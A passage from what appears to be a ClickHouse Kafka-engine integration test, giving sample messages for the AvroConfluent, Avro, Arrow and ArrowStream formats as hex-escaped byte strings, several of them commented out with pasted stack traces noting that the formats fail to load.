00\x04\x41\x4d\x00\x00\x00\x3f\x02\x18\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a',
# b'\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f',
# ],
# },
'AvroConfluent': {
'data_sample': [
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(cluster.schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
cluster.schema_registry_host,
cluster.schema_registry_port
),
'supports_empty_value': True,
}
# 'Arrow' : {
# # Not working at all: DB::Exception: Error while opening a table: Invalid: File is too small: 0, Stack trace (when copying this message, always include the lines below):
# # /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:107: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de010df in /usr/bin/clickhouse
# 'data_sample' : [
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# ],
# },
# 'ArrowStream' : {
# # Not working at all:
# # Error while opening a table: Invalid: Tried reading schema message, was null or length 0, Stack trace (when copying this message, always include the lines below):
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
